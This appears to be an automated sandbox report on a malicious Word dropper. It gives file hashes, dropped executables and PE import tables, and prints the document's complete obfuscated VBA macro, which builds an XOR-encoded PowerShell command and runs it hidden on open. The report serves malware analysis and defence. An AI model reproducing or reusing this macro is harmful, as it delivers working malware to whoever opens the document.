VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 (ms_office)
Classification: Exploit, Dropper, Downloader
3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)
022543.doc
Word Document
Created at 2018-06-25 14:51:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Files Information

Information | Value |
---|---|
Number of sample files submitted for analysis | 1 |
Number of files created and extracted during analysis | 8 |
Number of files modified and extracted during analysis | 0 |

c:\users\kft6utqw\appdata\local\temp\280.exe, ...
Severity: Suspicious
Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\280.exe (Created File) |
Name | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe (Created File) |
Size | 104.00 KB |
MD5 | bc1a4dc38f3236982d47496a1151f33f |
SHA1 | d112719238664d7996048614d75db8a67fc50fc5 |
SHA256 | 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 |
Actions | ... |
File Reputation Information

Information | Value |
---|---|
Severity | Suspicious |
Names | Win32.Exploit.Generic |
Families | Generic |
Classification | Exploit |
PE Information
Information | Value |
---|---|
Image Base | 0x400000 |
Entry Point | 0x4015a5 |
Size Of Code | 0x6000 |
Size Of Initialized Data | 0x10000 |
Size Of Uninitialized Data | 0x0 |
Format | x86 |
Type | Executable |
Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Machine Type | IMAGE_FILE_MACHINE_I386 |
Compile Timestamp | 2018-06-25 14:51:38 |
Compiler/Packer | Unknown |
Sections (4)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x2788 | 0x3000 | 0x1000 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.61 |
.rdata | 0x404000 | 0xb1ac | 0xc000 | 0x4000 | CNT_INITIALIZED_DATA, MEM_READ | 7.48 |
.data | 0x410000 | 0x6f7c | 0x6000 | 0x10000 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 7.9 |
.pdata | 0x417000 | 0x3040 | 0x4000 | 0x16000 | CNT_INITIALIZED_DATA, MEM_READ | 2.77 |
Imports (34)
GDI32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
MaskBlt | 0x0 | 0x404018 | 0xee1c | 0xee1c |
RPCRT4.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
NdrClientInitializeNew | 0x0 | 0x404064 | 0xee68 | 0xee68 |
CRYPT32.dll (2)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
CryptExportPublicKeyInfo | 0x0 | 0x40400c | 0xee10 | 0xee10 |
CryptFreeOIDFunctionAddress | 0x0 | 0x404010 | 0xee14 | 0xee14 |
SHLWAPI.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
SHSetThreadRef | 0x0 | 0x40406c | 0xee70 | 0xee70 |
ADVAPI32.dll (2)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
CryptReleaseContext | 0x0 | 0x404000 | 0xee04 | 0xee04 |
CryptSetKeyParam | 0x0 | 0x404004 | 0xee08 | 0xee08 |
KERNEL32.dll (14)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
ConnectNamedPipe | 0x0 | 0x404020 | 0xee24 | 0xee24 |
SetThreadExecutionState | 0x0 | 0x404024 | 0xee28 | 0xee28 |
CloseHandle | 0x0 | 0x404028 | 0xee2c | 0xee2c |
SwitchToThread | 0x0 | 0x40402c | 0xee30 | 0xee30 |
DeleteFileW | 0x0 | 0x404030 | 0xee34 | 0xee34 |
GetVersion | 0x0 | 0x404034 | 0xee38 | 0xee38 |
GetNamedPipeClientSessionId | 0x0 | 0x404038 | 0xee3c | 0xee3c |
GetLogicalDrives | 0x0 | 0x40403c | 0xee40 | 0xee40 |
GetFileMUIPath | 0x0 | 0x404040 | 0xee44 | 0xee44 |
SetHandleInformation | 0x0 | 0x404044 | 0xee48 | 0xee48 |
GlobalUnlock | 0x0 | 0x404048 | 0xee4c | 0xee4c |
FlsGetValue | 0x0 | 0x40404c | 0xee50 | 0xee50 |
SetPriorityClass | 0x0 | 0x404050 | 0xee54 | 0xee54 |
GetApplicationRestartSettings | 0x0 | 0x404054 | 0xee58 | 0xee58 |
RASAPI32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
RasGetCredentialsW | 0x0 | 0x40405c | 0xee60 | 0xee60 |
USER32.dll (12)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
DrawEdge | 0x0 | 0x404074 | 0xee78 | 0xee78 |
IsCharLowerA | 0x0 | 0x404078 | 0xee7c | 0xee7c |
IsCharAlphaNumericA | 0x0 | 0x40407c | 0xee80 | 0xee80 |
GetCaretPos | 0x0 | 0x404080 | 0xee84 | 0xee84 |
IsIconic | 0x0 | 0x404084 | 0xee88 | 0xee88 |
AllowSetForegroundWindow | 0x0 | 0x404088 | 0xee8c | 0xee8c |
IsChild | 0x0 | 0x40408c | 0xee90 | 0xee90 |
SetPhysicalCursorPos | 0x0 | 0x404090 | 0xee94 | 0xee94 |
GetUpdateRect | 0x0 | 0x404094 | 0xee98 | 0xee98 |
GetLastInputInfo | 0x0 | 0x404098 | 0xee9c | 0xee9c |
SetSysColors | 0x0 | 0x40409c | 0xeea0 | 0xeea0 |
GetClipboardViewer | 0x0 | 0x4040a0 | 0xeea4 | 0xeea4 |
c:\users\kft6utqw\desktop\022543.doc

Property | Value |
---|---|
Name | c:\users\kft6utqw\desktop\022543.doc (Sample File) |
Size | 216.25 KB |
MD5 | 5a51e63d898736046b20e5b7bbab88ae |
SHA1 | 6872e4301bba24de600600cbbb2434b244537134 |
SHA256 | 3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 |
Actions | ... |
VBA Information

Property | Value |
---|---|
Module Count | 2 |
Macro Count | 7 |
KbuiUkSaopBW.bas - Eventless

```vba
Function VhiXNiAhBlq()
On Error Resume Next
Ajbadj = (39068 / CBool(73181) + 39209 + CSng(zwwuY) * (58831 - wjWosF + 30324 - CLng(iEmwK)))
swAVoK = CByte(23542 * Tan(89958) / 92809 + CLng(wVNNt * 28451 * 14990 * Chr(98428)))
iSJYbCj = "Hel" + "l -j" + "oin " + Chr(40) + Chr(40) + "98,49 ," + " 4" + "4 , 1 , " + "123 ,4" + "0 , " + "35 " + ", "
HHzXnI = (50707 / CBool(22934) + 10762 + CSng(fhpJNG) * (96899 - ZkUjDn + 14967 - CLng(WsBbPw)))
DDqtbN = CByte(24987 * Tan(27512) / 96858 + CLng(wQhHL * 99423 * 14898 * Chr(91525)))
zBCUbNHikWj = "49, 107 " + ",41 ,3" + "6 " + ",44 , 35" + " ," + "37 ,50" + " ,102" + ",8 ,3" + "5," + " 50" + ", 104 " + ", 17 , "
iOYaD = (22939 / CBool(29349) + 91977 + CSng(hKiiiu) * (74354 - WMWiM + 42312 - CLng(ZHWak)))
sufzN = CByte(46800 * Tan(57876) / 54412 + CLng(hMRbjo * 54080 * 26329 * Chr(65631)))
okPwpO = "35, 36 " + ",5 ," + "42, 47," + "35 , " + "40 ," + " 50 " + ", 125," + " 98," + "54, 50," + "4,123 , " + "97 , 46," + "50, "
UFcvYj = (43755 / CBool(86304) + 5834 + CSng(wpoLa) * (78663 - zlVWI + 58448 - CLng(iKRkph)))
tooPFQ = CByte(97554 * Tan(12940) / 26839 + CLng(fbbqsX * 11371 * 617 * Chr(83875)))
ziiDhzzplja = "50 , " + "54 ," + " 124," + "105 ," + "105" + ", 37,"
dcNQL = (51383 / CBool(86213) + 32538 + CSng(SlDVC) * (4432 - AvVYR + 85241 - CLng(iqhCt)))
mLkzJU = CByte(33180 * Tan(52123) / 46535 + CLng(fXhsv * 9705 * 53965 * Chr(10898)))
NZXiMzzimtA = "41" + ", 43," + " 54, 52" + " , 35 " + ",39, " + "42 ,43 " + ",104 ," + " 40,3"
oqXJf = (36200 / CBool(13754) + 70664 + CSng(iZiXz) * (58903 - GBFMil + 50947 - CLng(spBjzb)))
ObiEv = CByte(29907 * Tan(2911) / 10073 + CLng(CkLszZ * 14105 * 45141 * Chr(6125)))
iGjtwGEpwK = "5," + " 50" + ",10" + "5 , 49 ," + "41 , " + "52 " + ", " + "34, 5" + "4, 52 " + ", 3"
pDWtq = (6865 / CBool(30966) + 90705 + CSng(pRXkd) * (18641 - CtviL + 9910 - CLng(aKwZid)))
iijim = CByte(41292 * Tan(85234) / 65983 + CLng(AfUjPN * 58412 * 98275 * Chr(65405)))
jwPztHmCYR = "5, 53 , " + "53 ,10" + "5 ,119" + ", 49" + ", 9 ,44" + ", 45 , 4" + "6 ," + "35" + " , 31,"
oWNcUF = (69279 / CBool(14462) + 92400 + CSng(sihSzG) * (75521 - CroRUF + 89552 - CLng(rVjMf)))
rzovUB = CByte(23024 * Tan(55957) / 4196 + CLng(wwvWz * 4456 * 70326 * Chr(17389)))
vPrlCwIKGiw = "3, 126 " + ",105" + ", 6, 46" + ",50" + ", 50, 54" + ",12" + "4,105 " + ", " + "105" + ", 49,49,"
mwquWC = (16695 / CBool(64425) + 32540 + CSng(ObjDt) * (75695 - dDmlfZ + 79907 - CLng(VVJYFp)))
XmsCAF = CByte(33642 * Tan(86676) / 22942 + CLng(vPnmM * 90225 * 4896 * Chr(67345)))
uXdNIdLS = "49 " + ", 104,4" + "7,37 ,36" + ", 104,3" + "7, 42 , " + "105" + " ,28" + ", " + "62,39 , " + "48 ,4"
YhWpH = (45015 / CBool(1409) + 38658 + CSng(hzJLZ) * (57095 - zLqmd + 23587 - CLng(aQkKB)))
IaGpqQ = CByte(7081 * Tan(815) / 94457 + CLng(iAlQLM * 21469 * 68762 * Chr(80754)))
HbEkKoDBwKo = "1,2 , " + "35," + " 1" + "05, 6 " + ",46" + " ,50,5" + "0 ,54 " + ", 124 , " + "105 ,10" + "5 , 49 "
iPjLw = (73917 / CBool(23653) + 44066 + CSng(YWNwjs) * (12986 - UVIaDz + 49208 - CLng(mrvwN)))
AUsEs = CByte(82079 * Tan(91114) / 85948 + CLng(EjDYO * 34159 * 2513 * Chr(8835)))
bZdZTS = ", 49, 49" + " , 1" + "04 , " + "37" + " , 46 , " + "51" + ", 40" + " ," + " 33," + " 37 , 5" + "1, 53 ," + "39"
FUrOh = (69058 / CBool(60043) + 30899 + CSng(zKuQY) * (67325 - WsGbz + 30906 - CLng(bREtzb)))
ulnXt = CByte(86719 * Tan(28167) / 73289 + CLng(IZcjvi * 17620 * 76579 * Chr(16040)))
sfvEXNncf = ",43 ,53 " + ", 41 " + ",52 ," + " 39 " + ", 54,52," + "47,43, 4" + "7 ,35 " + ", "
VhiXNiAhBlq = iSJYbCj + zBCUbNHikWj + okPwpO + ziiDhzzplja + NZXiMzzimtA + iGjtwGEpwK + jwPztHmCYR + vPrlCwIKGiw + uXdNIdLS + HbEkKoDBwKo + bZdZTS + sfvEXNncf
GsYuc = (46637 / CBool(78827) + 45328 + CSng(zdqfo) * (98777 - YHsfp + 7771 - CLng(FwCWjA)))
IQkiVS = CByte(41174 * Tan(81936) / 20129 + CLng(EVzoJR * 88483 * 76428 * Chr(63599)))
End Function

Function suWEZwq()
On Error Resume Next
JBvdiC = (16782 / CBool(36433) + 92120 + CSng(BFWWpM) * (11083 - Thjiw + 85914 - CLng(UEvwhI)))
CKiGVH = CByte(99788 * Tan(36502) / 18272 + CLng(ujwzw * 54410 * 99624 * Chr(94154)))
FZREhEi = "52 ," + " 104, 3" + "7 ,4" + "1 , 4" + "3," + "105 ,2" + ",17 " + ",1" + "26 ,34 ," + " 30 "
tTzHb = (9596 / CBool(5274) + 5334 + CSng(zNWOS) * (34630 - Mnirw + 1581 - CLng(XhnMu)))
VcvzVO = CByte(29656 * Tan(5075) / 5696 + CLng(BSEpV * 92042 * 61295 * Chr(61527)))
ZfuMF = ", 35, " + "105, 6 " + ",46," + " 50 ," + " 5" + "0,54,12" + "4 ,1" + "05,105 ," + "53 , 35 " + ", 52, 48" + " ,47,37 " + ", 3"
jwmoR = (10280 / CBool(25966) + 85545 + CSng(cZnsI) * (52479 - USXtDC + 305 - CLng(jhZtL)))
bBHvNf = CByte(67446 * Tan(77275) / 57976 + CLng(IWwadT * 17979 * 18835 * Chr(56756)))
oKiIcSOEV = "5 , 107" + " ,5" + "4, 37," + " 104 ," + "37," + " 41 ," + "43," + " 104,52"
BdImO = (57470 / CBool(92568) + 55514 + CSng(jjUhn) * (975 - jwuwF + 62010 - CLng(dljGZj)))
XPPLd = CByte(96680 * Tan(85921) / 39974 + CLng(jjGjuN * 76716 * 79698 * Chr(16663)))
ZoIRmFdA = " ,41 ," + " 105,11" + "3, " + "41 , 1" + "27, " + "41"
EnMOh = (88982 / CBool(40800) + 79422 + CSng(BhXWwv) * (22932 - EVKCf + 22360 - CLng(KNzAt)))
zrzzc = CByte(49698 * Tan(21681) / 992 + CLng(QIINTz * 23145 * 24478 * Chr(18962)))
jPRSO = " ," + " 54,11,3" + "1," + " 10" + "5 ,6, " + "46 " + ",50" + ", 50 , 5" + "4 " + ", 124, 1" + "05, 10"
izjTwX = (47177 / CBool(52757) + 94503 + CSng(UuVvQ) * (8187 - aWUVAQ + 41861 - CLng(BtSsP)))
ApPLRN = CByte(45879 * Tan(98103) / 54505 + CLng(wOwOW * 75656 * 26146 * Chr(93867)))
hGMqIhw = "5 , 4" + "3 , 4" + "7 ,40 ," + " 3" + "9," + " 43 , 47" + ",104 ,3" + "7 " + ", 4"
KlqpP = (64843 / CBool(64195) + 26730 + CSng(wiFjh) * (9793 - EFjwq + 34410 - CLng(uQWmTH)))
OfVdFN = CByte(19156 * Tan(671) / 99768 + CLng(kzJCzz * 29600 * 62682 * Chr(83468)))
cifQmikWdZ = "1,43,104" + ",50" + " ,49 , " + "105," + " 22," + " 114, 19" + ", 2 ,1," + "54" + " , 105 " + ",97 ,104" + ", 21 ," + "54 , 42"
RhdwYs = (19682 / CBool(92926) + 47837 + CSng(vNGjhw) * (68950 - crKEF + 11539 - CLng(qIYwS)))
FcNQj = CByte(3658 * Tan(45660) / 9806 + CLng(DNbHi * 43330 * 87580 * Chr(55143)))
piEztLzzd = ",4" + "7 , 50 ," + " 110 ,9" + "7 , " + "6,97,11" + "1 ,125" + ", 9" + "8 , 0 ," + " 2" + "8, 23, 1" + "02" + " , 123,"
zNJEz = (69058 / CBool(26404) + 53533 + CSng(jhjlA) * (11390 - plsPBw + 23296 - CLng(Oowcw)))
rzjEw = CByte(9704 * Tan(95684) / 2761 + CLng(dCFinX * 57132 * 34076 * Chr(25712)))
XMwAkpIdJOa = " 1" + "02 , 9" + "7 , 116," + " 126 " + ",118 , " + "97 , " + "125, 98" + ", 9," + " 51 ,"
WtkAM = (37581 / CBool(4777) + 3466 + CSng(pKnld) * (785 - kDhDAn + 76611 - CLng(ONvSY)))
lWjHbd = CByte(13230 * Tan(92906) / 37309 + CLng(uDoLRq * 34121 * 53191 * Chr(57172)))
mhrwSUvW = "44," + " 12" + "3 , 98 " + ", " + "35,40 ," + " 48 ,124" + " , 50 ," + " 35," + " 4"
nakJUj = (10640 / CBool(53320) + 73441 + CSng(XjdjEn) * (8342 - BWlnjw + 17715 - CLng(wbrYvU)))
cpKmZm = CByte(85793 * Tan(47050) / 59909 + CLng(TNKZH * 14532 * 57151 * Chr(73041)))
hDlzq = "3,5" + "4 ," + "109 " + ", 97 ,26" + " ,97" + ",109, " + "98,0 , 2" + "8 , 23" + ",109"
aHKzqo = (1276 / CBool(44314) + 70339 + CSng(kNEDuA) * (82570 - BfrIzG + 57280 - CLng(jwXqU)))
mHuhS = CByte(80921 * Tan(39084) / 96077 + CLng(PIuuw * 30141 * 19069 * Chr(30007)))
UPRmWskqHZa = " , " + "97 ,10" + "4 , " + "35" + " ," + " 62" + ", " + "35,9" + "7 , 12" + "5 , 32 ," + "41 ," + "52 ,"
suWEZwq = FZREhEi + ZfuMF + oKiIcSOEV + ZoIRmFdA + jPRSO + hGMqIhw + cifQmikWdZ + piEztLzzd + XMwAkpIdJOa + mhrwSUvW + hDlzq + UPRmWskqHZa
QOcGw = (33322 / CBool(18025) + 7989 + CSng(aFBzt) * (17628 - bwJNi + 1656 - CLng(DGbAD)))
hAZjw = CByte(49667 * Tan(12218) / 72408 + CLng(KcYOUt * 85956 * 43555 * Chr(31358)))
End Function

Function ffQYR()
On Error Resume Next
lYVTA = (4523 / CBool(81606) + 31040 + CSng(YAUQGs) * (77506 - jSATCk + 91493 - CLng(jpUjfK)))
LmRmMh = CByte(46991 * Tan(63046) / 16445 + CLng(RNfqM * 34493 * 40937 * Chr(61748)))
zBpmwC = "35 " + ",3" + "9,3" + "7,4" + "6, 110 ," + " 98, 7 " + ", 19, 19" + " ,10" + "2 " + ", 47,40"
MDQui = (76389 / CBool(49315) + 64216 + CSng(NWjJN) * (31687 - doGcs + 14687 - CLng(rKlXQv)))
XwALw = CByte(61594 * Tan(91240) / 84972 + CLng(zmzETm * 49995 * 15130 * Chr(99119)))
TPUdwNVvV = ",102" + ", 98" + ",54 ,50 " + ", 4 , " + "111 , 61" + ",50 " + ", 5" + "2 ,6" + "3 ,6" + "1 , 9" + "8,"
hicPD = (52407 / CBool(9610) + 34308 + CSng(kzQJm) * (661 - XjwPkN + 72650 - CLng(HpsDS)))
kdYBO = CByte(72568 * Tan(88707) / 69022 + CLng(ktOWIk * 67174 * 56096 * Chr(26846)))
owzIYCmMh = " 49" + ", 44 " + ",1,104," + "2 ," + "41" + " ,"
dPqJk = (58362 / CBool(37567) + 93370 + CSng(HOiBz) * (37088 - UrHXOw + 75566 - CLng(OVWqdV)))
Mizpq = CByte(87697 * Tan(38157) / 76653 + CLng(upXbi * 2990 * 84447 * Chr(28716)))
jVObzaqwTdG = "49 ,40" + " ,42,41," + "39 ," + " 34" + " ,0 ,47 " + ",4" + "2 ,35 ," + " 110 , 9" + "8," + " 7"
IQqVq = (79005 / CBool(63457) + 53664 + CSng(vOIcS) * (1136 - BDBJdG + 501 - CLng(kdZYL)))
MiHnV = CByte(9674 * Tan(64043) / 82957 + CLng(KIOpYZ * 28998 * 34338 * Chr(42957)))
hDCWm = ", 19,1" + "9,10" + "6 ,102,9" + "8 " + ",9,5" + "1,4" + "4, 11"
sjzqF = (50765 / CBool(3736) + 31689 + CSng(kMPIQw) * (67299 - ApzvCK + 29392 - CLng(BPQbiV)))
DBSYO = CByte(76239 * Tan(4293) / 24409 + CLng(ouGbv * 99635 * 95270 * Chr(82933)))
LFsiXAzLz = "1,1" + "25" + " ," + " 21 " + ",50" + ", 39 ," + " 52" + " ,50" + ", 107 "
ffQYR = zBpmwC + TPUdwNVvV + owzIYCmMh + jVObzaqwTdG + hDCWm + LFsiXAzLz
pOcYbp = (41514 / CBool(66170) + 99631 + CSng(LloIP) * (3201 - HzaUw + 97175 - CLng(dHHEnv)))
RZmpH = CByte(67647 * Tan(57883) / 49142 + CLng(DjnwBh * 70 * 73317 * Chr(83354)))
End Function

Function vZudztwuP()
On Error Resume Next
iszQV = (86417 / CBool(30360) + 98281 + CSng(UiRuEC) * (87917 - BTHSi + 65164 - CLng(XnIzb)))
GVMNMJ = CByte(33944 * Tan(15925) / 33631 + CLng(rkiEul * 72529 * 68237 * Chr(93122)))
mZWUiJLzwR = ",22 ,52," + " 41" + ",37, 35 " + ",53 , " + "53 ,1" + "02" + ", 98 ,9 "
VwSjH = (270 / CBool(20177) + 60172 + CSng(hkPXzN) * (23728 - hrscE + 69961 - CLng(QizcZ)))
BZDTaI = CByte(5636 * Tan(56514) / 12051 + CLng(wmOkL * 53263 * 24210 * Chr(68275)))
jVCqzH = ", 51, " + "44 ," + "125," + " 36 , " + "52, 3" + "5 ,39" + ", 4" + "5,1" + "25 , 5" + "9 , 37 " + ", 39" + " , 50"
ihErDf = (33618 / CBool(26522) + 91653 + CSng(ZAhFI) * (60589 - MDZEJ + 52079 - CLng(iuppAL)))
VQlrEz = CByte(63893 * Tan(92) / 77533 + CLng(vHKhM * 33066 * 63110 * Chr(11933)))
IHDEIar = ", 37 ,46" + ",61," + " 59 ," + "59 " + Chr(41) + " |%" + "{ [CHAR]" + Chr(40) + "$_ -bXo" + "r" + Chr(34) + "0x4" + "6" + Chr(34) + " " + Chr(41) + "} " + Chr(41) + " | " + ". " + Chr(40) + " $E"
APJKm = (48357 / CBool(11793) + 57617 + CSng(JpbNk) * (58610 - kvOEi + 57373 - CLng(PQJCQ)))
ScIjvK = CByte(48424 * Tan(24599) / 11025 + CLng(SwTUqw * 63238 * 64619 * Chr(44095)))
APGEAfQC = "Nv:C" + "OmSp" + "eC[" + "4,24,25]" + "-Jo" + "in" + "''" + Chr(41) + " "
vZudztwuP = mZWUiJLzwR + jVCqzH + IHDEIar + APGEAfQC
ibVSCW = (44175 / CBool(6396) + 88100 + CSng(cXpkuj) * (63505 - RZFqiw + 92895 - CLng(OJVQj)))
flPqHq = CByte(63888 * Tan(49242) / 76054 + CLng(SLWvI * 67072 * 49052 * Chr(19778)))
End Function
```
ENVladY.bas - Activate Workbook

```vba
Sub AutoOpen()
On Error Resume Next
lAuHI = (57743 / CBool(35575) + 69712 + CSng(crTdPo) * (97788 - nrRuWz + 19951 - CLng(cBMHLL)))
PzjcIo = CByte(50839 * Tan(40990) / 81080 + CLng(OIari * 71680 * 66749 * Chr(53958)))
mBAjLkU (mwIuTqKasZ)
DptVO = (1945 / CBool(68767) + 31988 + CSng(cGdfRE) * (7759 - jMqsMW + 52231 - CLng(IrjzuQ)))
fqIwVb = CByte(39900 * Tan(52796) / 47608 + CLng(usjlj * 82918 * 43485 * Chr(75890)))
End Sub
```
ENVladY.bas - Eventless

```vba
Function mwIuTqKasZ()
On Error Resume Next
rozwJ = (67400 / CBool(76549) + 74367 + CSng(ZnGPX) * (31364 - FVWBW + 12163 - CLng(tijdZ)))
EOEHAp = CByte(71279 * Tan(40747) / 55809 + CLng(dfwhk * 50300 * 91782 * Chr(77966)))
DiSWQPQiA = GnYaItdQB + Chr(iFukRA + 80 + kOwzwj) + "ow" + "ers"
zkEfJ = (15676 / CBool(81912) + 70603 + CSng(ENZFN) * (99263 - LiwPhf + 78551 - CLng(SsWYZm)))
nvKaC = CByte(98800 * Tan(68310) / 91934 + CLng(JEURPd * 45526 * 33379 * Chr(96950)))
ZrzZlU = (91511 / CBool(54858) + 24024 + CSng(lRLil) * (51065 - vnwzbn + 97233 - CLng(cKXMp)))
EaoNb = CByte(80320 * Tan(42316) / 48488 + CLng(HWXfN * 84328 * 87095 * Chr(81190)))
mwIuTqKasZ = WWzknl + DiSWQPQiA + VhiXNiAhBlq + suWEZwq + ffQYR + vZudztwuP
ozcdBm = (96095 / CBool(7959) + 97632 + CSng(IJXPX) * (90786 - rWRJkI + 42591 - CLng(paEHkN)))
UrYqsb = CByte(48066 * Tan(3510) / 29045 + CLng(qCQvj * 13805 * 99783 * Chr(69707)))
End Function

Function mBAjLkU(whKqOB)
On Error Resume Next
AWZWEr = (11870 / CBool(91052) + 22041 + CSng(twOFZ) * (78902 - rhCFSV + 3738 - CLng(tFFmGT)))
XDNMv = CByte(41161 * Tan(38460) / 97898 + CLng(fNpVbc * 93338 * 82060 * Chr(12912)))
PShbi = (2237 / CBool(44688) + 70528 + CSng(lAIEs) * (78384 - KsMtK + 45480 - CLng(PZEfjK)))
JPfDD = CByte(72814 * Tan(79884) / 54616 + CLng(LYkJNm * 44470 * 16918 * Chr(94078)))
DmvtdQv = DtEFQrZRRpI + HYmQfXj + Shell(WzPZHVRYA + whKqOB + haTFtqcwzK, (20827 / 20827) - 1)
CSEdNs = (84391 / CBool(70421) + 34892 + CSng(dVqZt) * (54108 - cBoCji + 25702 - CLng(VZNUd)))
wizIw = CByte(10074 * Tan(71716) / 35814 + CLng(MBXaB * 80862 * 64050 * Chr(20678)))
End Function
```
c:\users\kft6utqw\appdata\local\temp\280.exe, ...

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\280.exe (Created File) |
Name | c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (Created File) |
Name | c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (Created File) |
Name | c:\users\kft6utqw\appdata\local\temp\d3d4.tmp (Created File) |
Name | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe (Created File) |
Name | c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe (Created File) |
Size | 0.00 KB |
MD5 | d41d8cd98f00b204e9800998ecf8427e |
SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
c:\programdata\oyvgkgw.exe, ...

Property | Value |
---|---|
Name | c:\programdata\oyvgkgw.exe (Created File) |
Name | c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe (Created File) |
Size | 328.05 KB |
MD5 | cbe11e9a9e71737f15e8f1c606ad8d8c |
SHA1 | 2d4575457d337753a57b7941d13ac9665342641a |
SHA256 | 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343 |
Actions | ... |

PE Information
Information | Value |
---|---|
Image Base | 0x400000 |
Entry Point | 0x40168c |
Size Of Code | 0xd000 |
Size Of Initialized Data | 0x44000 |
Size Of Uninitialized Data | 0x0 |
Format | x86 |
Type | Executable |
Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Machine Type | IMAGE_FILE_MACHINE_I386 |
Compile Timestamp | 2018-06-25 08:17:28 |
Compiler/Packer | Unknown |
Sections (3)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0xced2 | 0xd000 | 0x1000 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.94 |
.data | 0x40e000 | 0xe3c | 0x1000 | 0xe000 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 0.0 |
.rsrc | 0x40f000 | 0x426e4 | 0x43000 | 0xf000 | CNT_INITIALIZED_DATA, MEM_READ | 7.85 |
Imports (95)
MSVBVM60.DLL (95)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
__vbaVarSub | 0x0 | 0x401000 | 0xd7cc | 0xd7cc |
_CIcos | 0x0 | 0x401004 | 0xd7d0 | 0xd7d0 |
_adj_fptan | 0x0 | 0x401008 | 0xd7d4 | 0xd7d4 |
__vbaStrI4 | 0x0 | 0x40100c | 0xd7d8 | 0xd7d8 |
__vbaVarMove | 0x0 | 0x401010 | 0xd7dc | 0xd7dc |
__vbaFreeVar | 0x0 | 0x401014 | 0xd7e0 | 0xd7e0 |
__vbaAryMove | 0x0 | 0x401018 | 0xd7e4 | 0xd7e4 |
__vbaStrVarMove | 0x0 | 0x40101c | 0xd7e8 | 0xd7e8 |
__vbaLenBstr | 0x0 | 0x401020 | 0xd7ec | 0xd7ec |
__vbaEnd | 0x0 | 0x401024 | 0xd7f0 | 0xd7f0 |
__vbaFreeVarList | 0x0 | 0x401028 | 0xd7f4 | 0xd7f4 |
_adj_fdiv_m64 | 0x0 | 0x40102c | 0xd7f8 | 0xd7f8 |
__vbaFreeObjList | 0x0 | 0x401030 | 0xd7fc | 0xd7fc |
(by ordinal) | 0x204 | 0x401034 | 0xd800 | 0xd800 |
_adj_fprem1 | 0x0 | 0x401038 | 0xd804 | 0xd804 |
__vbaStrCat | 0x0 | 0x40103c | 0xd808 | 0xd808 |
__vbaSetSystemError | 0x0 | 0x401040 | 0xd80c | 0xd80c |
__vbaHresultCheckObj | 0x0 | 0x401044 | 0xd810 | 0xd810 |
_adj_fdiv_m32 | 0x0 | 0x401048 | 0xd814 | 0xd814 |
__vbaAryDestruct | 0x0 | 0x40104c | 0xd818 | 0xd818 |
(by ordinal) | 0x251 | 0x401050 | 0xd81c | 0xd81c |
__vbaVarForInit | 0x0 | 0x401054 | 0xd820 | 0xd820 |
__vbaExitProc | 0x0 | 0x401058 | 0xd824 | 0xd824 |
(by ordinal) | 0x252 | 0x40105c | 0xd828 | 0xd828 |
__vbaObjSet | 0x0 | 0x401060 | 0xd82c | 0xd82c |
(by ordinal) | 0x253 | 0x401064 | 0xd830 | 0xd830 |
__vbaOnError | 0x0 | 0x401068 | 0xd834 | 0xd834 |
_adj_fdiv_m16i | 0x0 | 0x40106c | 0xd838 | 0xd838 |
_adj_fdivr_m16i | 0x0 | 0x401070 | 0xd83c | 0xd83c |
(by ordinal) | 0x256 | 0x401074 | 0xd840 | 0xd840 |
__vbaFpR8 | 0x0 | 0x401078 | 0xd844 | 0xd844 |
_CIsin | 0x0 | 0x40107c | 0xd848 | 0xd848 |
(by ordinal) | 0x277 | 0x401080 | 0xd84c | 0xd84c |
(by ordinal) | 0x278 | 0x401084 | 0xd850 | 0xd850 |
__vbaChkstk | 0x0 | 0x401088 | 0xd854 | 0xd854 |
EVENT_SINK_AddRef | 0x0 | 0x40108c | 0xd858 | 0xd858 |
__vbaGenerateBoundsError | 0x0 | 0x401090 | 0xd85c | 0xd85c |
__vbaStrCmp | 0x0 | 0x401094 | 0xd860 | 0xd860 |
__vbaVarTstEq | 0x0 | 0x401098 | 0xd864 | 0xd864 |
__vbaI2I4 | 0x0 | 0x40109c | 0xd868 | 0xd868 |
DllFunctionCall | 0x0 | 0x4010a0 | 0xd86c | 0xd86c |
__vbaRedimPreserve | 0x0 | 0x4010a4 | 0xd870 | 0xd870 |
_adj_fpatan | 0x0 | 0x4010a8 | 0xd874 | 0xd874 |
